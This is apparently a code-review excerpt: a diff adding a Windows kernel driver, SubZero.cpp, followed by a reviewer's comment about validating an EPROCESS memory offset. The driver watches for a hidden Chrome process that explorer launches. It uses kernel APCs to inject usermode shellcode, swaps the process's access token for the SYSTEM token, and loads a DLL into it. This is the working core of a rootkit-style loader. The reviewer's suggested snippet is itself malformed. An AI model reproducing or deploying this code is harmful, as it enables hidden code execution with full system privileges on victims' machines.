Project/SubZeroDriver/SubZero.cpp

```diff
@@ -0,0 +1,456 @@
+
+		// Register for Process notifications in order to catch the ghost chrome launch
+		auto status = ::PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to register Process callback (status=0x%08X)\n", status));
+			return;
+		}
+
+		// Queue APC for chrome creation
+		if (::ExAcquireRundownProtection(&g_Globals.RundownProtection)) {
+			::PsLookupThreadByThreadId(ThreadId, &thread);
+			if (!QueueAPC(thread, KernelMode, [](PVOID, PVOID, PVOID) { InjectUsermodeShellcodeAPC(LaunchChromeShellcode, sizeof(LaunchChromeShellcode)); }))
+				::ExReleaseRundownProtection(&g_Globals.RundownProtection);
+		}
+		else KdPrint((DRIVER_PREFIX "[-] Error acquiring rundown protection\n"));
+	}
+	// Search for chrome's first Thread
+	else if (pid == g_Globals.ChromePID) {
+
+		// Check if the first Thread was already found
+		if (g_Globals.ChromeFirstThreadID != 0) return;
+
+		KdPrint((DRIVER_PREFIX "[+] chrome first Thread catched. TID: %d\n", tid));
+		g_Globals.ChromeFirstThreadID = tid;
+
+		// Queue APC for dll loading
+		if (::ExAcquireRundownProtection(&g_Globals.RundownProtection)) {
+			::PsLookupThreadByThreadId(ThreadId, &thread);
+
+			
+			if (!QueueAPC(thread, KernelMode, [](PVOID, PVOID, PVOID) 
+				{
+					PEPROCESS Process;
+					PACCESS_TOKEN Token;
+				
+					Process = PsGetCurrentProcess();			// Get current process (i.e. chrome.exe)
+					Token = ::PsReferencePrimaryToken(Process); // Get the process token
+					ReplaceToken(Process, Token);				// Replace the process token with system token
+					::ObDereferenceObject(Token);				// Dereference the process token
+					
+					// Thread and Process creation notification callbacks are not needed anymore
+					::PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
+					::PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
+
+					// Now inject the shellcode
+					InjectUsermodeShellcodeAPC(LoadLibraryShellcode, sizeof(LoadLibraryShellcode));
+			}))
+				::ExReleaseRundownProtection(&g_Globals.RundownProtection);			
+		}
+		else KdPrint((DRIVER_PREFIX "[-] Error acquiring rundown protection\n"));
+	}
+}
+
+void OnProcessNotify(PEPROCESS, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo) {
+	// Process creation only
+	if (!CreateInfo) return;
+
+	auto pid = ::HandleToULong(ProcessId);
+	if (g_Globals.ChromePID == 0) {
+
+		// Search for our ghost chrome 
+		if (::HandleToULong(CreateInfo->ParentProcessId) == g_Globals.ExplorerPID) {
+			KdPrint((DRIVER_PREFIX "[+] Chrome.exe catched. PID: %d\n", pid));
+			g_Globals.ChromePID = pid;
+			return;
+		}
+	}
+}
+
+bool FindProcessByName(CHAR* Name, PEPROCESS* Process)
+{
+	PEPROCESS initialSystemProcess = PsInitialSystemProcess;
+	PEPROCESS currentEntry = initialSystemProcess;
+
+	CHAR imageName[30];
+
+	do
+	{
+		RtlCopyMemory((PVOID)(&imageName), (PVOID)((uintptr_t)currentEntry + 0x450) /* EPROCESS->ImageFileName */, sizeof(imageName));
```

Comment:
You should verify that you are accessing legit memory address BEFORE accessing it, the general case is: 
```
PEPROCESS process = (PVOID)((uintptr_t)currentEntry + 0x450;
if(nullptr != process) {...}
```
But maybe there is better check to actually validates that this is legit memory address OF `EPROCESS`.